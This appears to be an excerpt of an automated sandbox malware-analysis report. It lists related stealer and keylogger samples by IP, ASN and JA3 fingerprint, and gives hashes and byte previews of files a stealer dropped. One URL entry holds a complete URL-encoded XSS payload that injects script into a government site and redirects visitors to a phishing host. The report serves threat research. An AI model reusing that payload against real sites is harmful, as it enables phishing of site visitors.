                                                                                                                                • 172.67.183.74
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 172.67.183.74
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.18.193
                                                                                                                                treatynreit.sitefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                                                • 172.67.184.196
                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 172.67.184.196
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 172.67.184.196
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 172.67.184.196
                                                                                                                                questionsmw.storefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 104.21.77.132
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.77.132
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 172.67.208.141
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.77.132
                                                                                                                                steamcommunity.com5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                13Xdl6SYqQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                zSHXL8jq8M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                win.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 104.102.49.254
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 104.102.49.254

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                CLOUDFLARENETUSDHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.96.3
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.12
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.222.167
                                                                                                                                CLOUDFLARENETUSDHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.96.3
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.12
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.222.167
                                                                                                                                CLOUDFLARENETUSDHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.216.244
                                                                                                                                Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 188.114.96.3
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.16.12
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 188.114.97.3
                                                                                                                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.78.54
                                                                                                                                4bblnRvDdS.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.222.167
                                                                                                                                HETZNER-ASDEoRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                • 178.63.51.126
                                                                                                                                https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 136.243.216.232
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                                • 195.201.57.90
                                                                                                                                N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                                                • 195.201.57.90
                                                                                                                                https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                                                • 5.161.250.225
                                                                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 197.242.86.248

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 49.12.197.9
                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                zSHXL8jq8M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                4DC70000.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12
                                                                                                                                win.exeGet hashmaliciousLummaCBrowse
                                                                                                                                • 104.21.84.18
                                                                                                                                • 104.21.18.193
                                                                                                                                • 104.21.17.174
                                                                                                                                • 104.21.21.3
                                                                                                                                • 188.114.96.3
                                                                                                                                • 172.67.208.141
                                                                                                                                • 104.102.49.254
                                                                                                                                • 172.67.152.190
                                                                                                                                • 104.21.16.12

                                                                                                                                Dropped Files

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                C:\ProgramData\ECBKKKFHCF.exefile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                  C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\ProgramData\ECBKKKFHCF.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):391072
                                                                                                                                                      Entropy (8bit):7.98768128979655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:A+wIKgwXXUXc+y+VrRlmZwTIwniaYiHQlqy1V0eUspq3lQVGpLqydC2a9EO:AQsXXUs+y+xR8aniXiHQxnFUcrVuLquE
                                                                                                                                                      MD5:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      SHA1:D203D8C541918496D75C6C36C43DF8E98CD8AEF8
                                                                                                                                                      SHA-256:43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                                                                                                                                                      SHA-512:3BAFF4F6D869F97B4D6D6E1406074B4EE9E227F40AC3234504D4540DD9B4098A7CD9D12083D92DF4DD88389166779A67CB9D06257B635674AEA21641083E9BBC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................N.... ........@.. ...................................`.....................................S.......B...........x...(&........................................................... ............... ..H............text...T.... ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B................0.......H.......P...p............................................................".........^n.d...x:8"h..>.Y.....6.......ni.U..t...]O....mo'.'.Y.qM.zB.j.0t....:.J.y3R...3..s..........:..\nk.S.Nx.....q.=._...t....0.,...hpO.....~..3`.......b.u.Up{[."..(..~.@KK.$h...C.be.d...g...|;;..ZV%W..J.{R.Fb.....ef..S=............X..~[e....B [g9%/.@g.+..I..Z.h.2A.S.2.C........"...Q.k.x..;.H.{J..C...qd.L}PGb.S6.o....z..{..\x..x=8...y.....@Z...PQm..7u\.I...W..Fo.q....o<{....8\

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\AAAAKJ

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40960
                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\AFCBFI

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):155648
                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\BAKEBA

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):10237
                                                                                                                                                      Entropy (8bit):5.498288591230544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                      MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                      SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                      SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                      SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\CAAKFI

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):106496
                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\DAKJDH

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                      Entropy (8bit):0.0357803477377646
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                      MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                      SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                      SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                      SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\DAKJDH-shm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\DHIDHI

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):98304
                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
